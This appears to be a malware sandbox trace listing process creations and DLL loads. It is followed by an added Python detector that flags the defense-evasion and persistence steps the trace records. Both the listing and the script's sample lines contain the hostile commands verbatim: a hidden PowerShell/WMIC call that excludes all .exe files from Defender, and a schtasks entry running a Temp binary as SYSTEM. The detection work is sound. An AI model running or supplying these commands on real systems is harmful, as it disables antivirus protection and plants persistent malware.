Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe  Process created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe .\Install.exe /nxdidQZJ "385118" /S
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Process created: C:\Users\user\AppData\Local\Temp\u69w.0.exe "C:\Users\user\AppData\Local\Temp\u69w.0.exe"
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Process created: C:\Users\user\AppData\Local\Temp\u69w.1.exe "C:\Users\user\AppData\Local\Temp\u69w.1.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe  Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
Source: C:\Windows\SysWOW64\forfiles.exe  Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe  Process created: C:\Users\user\AppData\Local\Temp\u4dc.0.exe "C:\Users\user\AppData\Local\Temp\u4dc.0.exe"
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe  Process created: unknown unknown
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Process created: unknown unknown
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeProcess created: unknown unknown
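The process-creation entries above record the two defense-evasion and persistence actions a responder should pull out of this trace first: Install.exe proxies through forfiles.exe, cmd.exe and a hidden powershell.exe to reach WMIC.exe, which calls MSFT_MpPreference Add with ExclusionExtension=exe (every .exe on the host is then excluded from Defender scanning), and the same Install.exe registers a scheduled task that runs koEMGMU.exe from the user's Temp directory as SYSTEM. The Python below is an added example for this report, not Joe Sandbox output and not code from the sample: it parses "Source: ... Process created: ..." lines in the form shown here, flags those behaviours, and rebuilds the creator lineage of each flagged process from the Source column. The rule names, the USER_WRITABLE prefix list and the selection of sample lines copied from the listing are this example's own assumptions.

```python
r"""
Added example for this sandbox report (not Joe Sandbox code and not the sample's code).
Parses "Source: <creator> Process created: <image> <cmdline>" lines and flags:

  defender_exclusion_added    Defender exclusion added via the MSFT_MpPreference WMI class
  system_task_from_user_path  schtasks /CREATE ... /RU SYSTEM with the binary in a user-writable path
  forfiles_proxy_exec         forfiles.exe /c used to launch cmd or powershell
  hidden_powershell           powershell started with -WindowStyle Hidden

Rule names and the USER_WRITABLE prefix list are this example's own assumptions.
"""
import re
from dataclasses import dataclass

# Constructed sample: lines copied from the report listing above.  The last
# "unknown unknown" entry is kept on purpose; the sandbox emits it when the
# child image could not be resolved, and the parser must not choke on it.
SAMPLE_LINES = r"""
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe Process created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe .\Install.exe /nxdidQZJ "385118" /S
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe Process created: C:\Users\user\AppData\Local\Temp\u4dc.0.exe "C:\Users\user\AppData\Local\Temp\u4dc.0.exe"
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe Process created: unknown unknown
"""

LINE_RE = re.compile(r"^Source:\s+(?P<source>\S+)\s+Process created:\s+(?P<image>\S+)\s*(?P<cmdline>.*)$")
EXCLUSION_RE = re.compile(r"msft_mppreference\s+call\s+add\s+(exclusion\w+=\S+)", re.I)
TASK_BIN_RE = re.compile(r'/tr\s+.*?([a-z]:\\[^"]+?\.exe)', re.I)
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")  # assumed prefixes


@dataclass
class ProcEvent:
    source: str   # creating process (the report's Source column)
    image: str    # created process image path
    cmdline: str  # command line as recorded


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def parse(lines):
    """Turn report lines into ProcEvent records; lines of any other shape are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(ProcEvent(m["source"], m["image"], m["cmdline"]))
    return events


def is_user_writable(path: str) -> bool:
    low = path.lower()
    return any(p in low for p in USER_WRITABLE)


def classify(ev: ProcEvent):
    """Return [(rule, detail), ...] for one event; an empty list means nothing flagged."""
    hits = []
    img = basename(ev.image).lower()
    cl = ev.cmdline
    m = EXCLUSION_RE.search(cl)
    if m:  # fires on every hop that carries the nested command line, not only on WMIC.exe
        hits.append(("defender_exclusion_added", m.group(1)))
    if img == "schtasks.exe" and re.search(r"/create\b", cl, re.I) and re.search(r'/ru\s+"?system\b', cl, re.I):
        m = TASK_BIN_RE.search(cl)
        if m and is_user_writable(m.group(1)):
            hits.append(("system_task_from_user_path", m.group(1)))
    if img == "forfiles.exe":
        m = re.search(r'/c\s+"?(cmd|powershell)\b', cl, re.I)
        if m:
            hits.append(("forfiles_proxy_exec", m.group(1).lower()))
    if img == "powershell.exe" and re.search(r"-windowstyle\s+hidden", cl, re.I):
        hits.append(("hidden_powershell", "WindowStyle Hidden"))
    return hits


def lineage(events, ev: ProcEvent, max_depth: int = 16):
    """Follow Source links back to the root; returns image basenames, root first."""
    created_by = {e.image: e for e in events}
    chain = [ev.image, ev.source]
    cur = ev
    for _ in range(max_depth):
        cur = created_by.get(cur.source)
        if cur is None:
            break
        chain.append(cur.source)
    return [basename(p) for p in reversed(chain)]


def scan(events):
    """Classify every event and attach its lineage; only flagged events are returned."""
    findings = []
    for ev in events:
        hits = classify(ev)
        if hits:
            findings.append({"image": basename(ev.image), "rules": [r for r, _ in hits],
                             "details": dict(hits), "lineage": lineage(events, ev)})
    return findings


if __name__ == "__main__":
    for f in scan(parse(SAMPLE_LINES.splitlines())):
        print(f"{f['image']:<16} {', '.join(f['rules'])}")
        print("    lineage:", " > ".join(f["lineage"]))
```

Because forfiles, cmd and powershell each carry the full nested command line, the exclusion rule fires on four separate process-creation events for a single Defender change; a detection keyed on the MSFT_MpPreference string should therefore be deduplicated on the lineage, not counted per event. On a live host the outcome of the chain is visible in (Get-MpPreference).ExclusionExtension, and the persistence in schtasks /Query /TN bWycNackLSywaqkmgR /V.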
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: apphelp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: apphelp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: winhttp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: msimg32.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: mswsock.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: napinsp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: wshbth.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: winrnr.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: napinsp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: wshbth.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: winrnr.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: napinsp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: wshbth.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: winrnr.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: wldp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: propsys.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: profapi.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: edputil.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: urlmon.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: iertutil.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: srvcli.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: netutils.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: sspicli.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: wintypes.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: appresolver.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: slc.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: userenv.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: sppc.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: pcacli.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: mpr.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: napinsp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: wshbth.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: winrnr.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: napinsp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: wshbth.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: winrnr.dll
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: wininet.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: gpedit.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: activeds.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: dssec.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: dsuiext.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: framedynos.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: dsrole.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: logoncli.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: mpr.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: activeds.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ntdsapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: authz.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: adsldpc.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: adsldpc.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: webio.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: schannel.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: rsaenh.dll
